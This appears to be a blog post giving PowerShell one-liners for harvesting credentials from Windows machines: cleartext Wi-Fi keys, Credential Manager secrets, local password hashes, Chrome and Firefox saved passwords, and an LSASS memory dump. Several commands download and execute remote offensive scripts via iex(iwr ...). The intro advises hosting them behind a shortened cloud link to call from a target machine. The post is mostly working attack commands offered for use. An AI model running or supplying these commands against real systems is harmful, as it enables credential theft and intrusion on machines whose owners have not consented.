PowerShell Password One-liners

Here are some PowerShell One-Liners to pull various credentials from Windows machines. Dump all of these in a single script, host on OneDrive/Dropbox, use a URL shortener to give you a nice small link and then you can call it from a machine using something like



Get Stored Passwords from Wireless Profiles

(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)}  | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize

Get Stored Passwords from Credential Manager

[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];(New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll() | % { $_.RetrievePassword();$_ }

Dump local account password hashes
Nishang – PowerShell for penetration testing and offensive security. (https://github.com/samratashok/nishang)

iex(iwr https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1);get-passhashes

This function returns any passwords and history stored in the chrome sqlite databases.
PowerShell Empire (https://github.com/EmpireProject/Empire)

iex(iwr https://raw.githubusercontent.com/adaptivethreat/Empire/master/data/module_source/collection/Get-ChromeDump.ps1);get-chromedump

This script will utilize the api functions within the nss3.dll to decrypt saved passwords. This will only be successfull if the masterpassword has not been set.
PowerShell Empire (https://github.com/EmpireProject/Empire)

iex(iwr https://github.com/adaptivethreat/Empire/blob/master/data/module_source/collection/Get-FoxDump.ps1);get-foxdump

Dump MiniDump File
PowerSploit – A PowerShell Post-Exploitation Framework (https://github.com/PowerShellMafia/PowerSploit)

iex(iwr https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1); Get-Process lsass | Out-Minidump -DumpFilePath (pwd).Path

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s